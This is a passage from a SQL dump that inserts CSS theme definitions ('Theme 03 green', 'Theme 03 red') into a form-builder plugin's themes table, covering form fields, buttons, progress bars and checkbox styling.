"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: rgb(158, 0, 0);\r\n	vertical-align: top;\r\nfloat:left;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 4px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #3F3927;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n	font-weight: bold;\r\n}\r\n.page_deactive:nth-child(even) {\r\n	background-color: #EEEEEE;\r\n}\r\n.page_deactive:nth-child(odd) {\r\n	background-color: #EEEEEE;\r\n}\r\n.page_active {\r\n	color: #3F3927;\r\n	cursor: pointer;\r\n	background-color: #CEECE2;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 18px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 17px;\r\n	line-height: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #95D3BE ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #80CEB4 0%, #95D6C1 49%, #95D3BE 84%, #B3E7D6 99%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #80CEB4 ), color-stop(49%, #95D6C1 ), color-stop(84%, #95D3BE ), color-stop(99%, #B3E7D6 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #80CEB4 0%, #95D6C1 49%, #95D3BE 84%, #B3E7D6 99%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #80CEB4 0%, #95D6C1 49%, #95D3BE 84%, #B3E7D6 99%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #80CEB4 0%, #95D6C1 49%, #95D3BE 84%, #B3E7D6 99%); /* IE10+ */\r\n	background: linear-gradient(to right, #80CEB4 0%, #95D6C1 49%, #95D3BE 84%, #B3E7D6 99%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 17px;\r\n	line-height: 17px;\r\n	background-color: #E0DFE0;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -2px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #292929;\r\n	font-weight: bold;\r\nfont-size:13px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 17px;\r\n	height: 17px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}', 0);
INSERT INTO `cyb_formmaker_themes` (`id`, `title`, `css`, `default`) VALUES
(9, 'Theme 03 green', '.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EEEF;\r\nborder: 1px solid #3A620A;\r\nmargin-bottom: 10px;\r\ncolor: #3A620A;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 0px;\r\n	border: 1px solid #39680B;\r\n	background: #C9FD9C;\r\n	height: 13px;\r\n	width: 13px;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -5px !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #4A8C08!important;\r\n	color: #fff;\r\n}\r\n.ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #C9FD9C !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/03/01/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 32px;\r\n	height: 25px;\r\n	background: url([SITE_ROOT]/images/03/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background-color: #ACABAB;\r\npadding: 2px 15px;\r\nvertical-align: middle;\r\nborder: none;\r\nfont-size: 15px;\r\n}\r\n\r\n\r\n.button-submit {\r\n	background: #3A620A;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #fff;\r\n	border: 2px solid #4A8C08;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 1px 1px #44740E;\r\n	font-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: #D8D6D7;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 2px solid #fff;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px 1px #969495;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #CDD9C3;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/03/01/bg.png);\r\n	text-align: left;\r\n	padding: 10px 20px 10px 50px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: right;\r\n	color: #000;\r\nfont-size: 18px;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 15px;\r\ntext-align: left;\r\nfont-size: 18px;\r\ncolor: #555;\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n	padding: 0px 15px;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	padding: 2px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n	background-color: #DFDFDF;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #fff;\r\n	background-color: #42810e;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	background-color: #36690c;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 33px;\r\n	text-align: center;\r\n	font-size: 21px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-bottom: -13px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 20px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #62983A; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #61b217 0%, #62983a 39%, #62983a 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #61b217), color-stop(39%, #62983a), color-stop(100%, #62983a)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #61b217 0%, #62983a 39%, #62983a 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #61b217 0%, #62983a 39%, #62983a 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #61b217 0%, #62983a 39%, #62983a 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #61b217 0%, #62983a 39%, #62983a 100%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #DFDFDF;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -34px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 12px;\r\nline-height: 18px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 34px;\r\n	height: 18px;\r\n	background: url([SITE_ROOT]/images/03/01/percentage_arrow.png);\r\n	position: relative;\r\n	left: -1px;\r\ntop:0px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}', 0),
(10, 'Theme 03 red', '.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EEEF;\r\nborder: 1px solid #811919;\r\nmargin-bottom: 10px;\r\ncolor: #811919;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 0px;\r\n	border: 1px solid #39680B;\r\n	background: #C9FD9C;\r\n	height: 13px;\r\n	width: 13px;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -5px !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #942323 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: 